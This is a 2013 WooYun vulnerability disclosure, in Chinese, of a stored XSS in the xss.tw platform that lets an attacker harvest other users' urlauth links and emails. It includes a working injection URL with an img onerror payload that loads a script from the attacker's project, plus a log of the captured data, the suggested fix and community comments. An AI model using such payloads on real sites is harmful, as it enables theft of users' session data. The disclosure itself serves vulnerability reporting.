当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018043

漏洞标题:xss.tw 又一个存储型xss 可偷取 别人的urlauth信息

相关厂商:xss.tw

漏洞作者: c4rp3nt3r

提交时间:2013-01-29 11:57

修复时间:2013-01-29 11:57

公开时间:2013-01-29 11:57

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:2

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-01-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

xss.tw 又一个存储型xss 可偷取 别人的urlauth信息.
话说 xss.tw 太慢了,就自己测试了下自己,就不测试别人了.

详细说明:

提交:

http://xss.tw/1293/?keepsession=&location=http%3A//xss.tw/Project/TestCode/pid/1293&toplocation=http%3A//xss.tw/Project/TestCode/pid/1293&cookie=<img style='display: none' src=cc id=script onerror='var e=document.createElement(this.id);e.src=top.location.href.substring(0,14)%2B1340;document.body.appendChild(e);'>PHPSESSID%3Dpsl0ji26uqeb70fr19f3mkg8r3&opener=http%3A//xss.tw/Project/ViewCode/pid/1293&title=Xss代码测试运行


完了访问 触发漏洞...
http://xss.tw/Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3
发给别人的话能够 盗取 别人urlauth 的地址,以及别人的邮箱...
钓鱼就算了,估计玩这个的安全意识挺高的...
新玩这个,有错请指出...

漏洞证明:

xss.tw.png


[tehran]$ cat xss.tw_result.txt 
============================
Time: 2013-01-29 11:48:27 ip: 看不到我看不到我 HTTP_USER_AGENT: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 HTTP_REFERER:http://xss.tw/Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3 Pid:pid:1340 e57d44326d0d看不到我看不到我2a75238
============================
Time: 2013-01-29 11:48:27 ip: 看不到我看不到我 HTTP_USER_AGENT: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 HTTP_REFERER:http://xss.tw/Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3 Pid:pid:1293 8f0d2fd263093432694bc5397bbd19e3


修复方案:

htmlspecialchars();

版权声明:转载请注明来源 c4rp3nt3r@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-01-29 11:57 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个例子再次告诉我们 只有花钱的才是靠谱的

  2. 2013-01-29 12:01 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)

    @xsser 老大不让人修补下就直接公开了阿~~~~~~~~

  3. 2013-01-29 12:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @c4rp3nt3r 很快就会看到了...

  4. 2013-01-29 12:17 |  ( 路人 | Rank:17 漏洞数:3 | 博客寻友链 http://imlonghao.com/)

    @xsser ...........50W啊

  5. 2013-01-29 12:49 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    楼主的特异功能哪里学的

  6. 2013-01-29 13:03 | hqdvista ( 普通白帽子 | Rank:154 漏洞数:31 | N/A)

    其实把response的content-type改成json就行了。现在用的text/html来显示json本来有xss的风险,应该是个经典问题

  7. 2013-01-29 14:07 | Wdot ( 实习白帽子 | Rank:77 漏洞数:12 | it came too later)

    为什么我总是后知后觉咧。多搞搞才有进步嘛

  8. 2013-01-29 14:09 | Wdot ( 实习白帽子 | Rank:77 漏洞数:12 | it came too later)

    xsser.me那个referer的xss,我就知道我这地方不严谨的~搞那么久才有人发出来。

  9. 2013-01-29 14:15 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Wdot xsser.tw不好注册厂商,回头我们做成可以认领机制又不用注册厂商的

  10. 2013-01-29 14:18 | Wdot ( 实习白帽子 | Rank:77 漏洞数:12 | it came too later)

    @xsser 以后可以@用户就好了撒

  11. 2013-01-29 15:42 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    看不到我,看不到我。。。

  12. 2013-01-29 19:30 | wugui ( 路人 | Rank:15 漏洞数:4 | wugui@lcx.cc)

    被x 了

  13. 2013-01-30 17:21 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    @xsser 西奈!

  14. 2013-03-05 21:13 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    @xsser 50大洋好贵!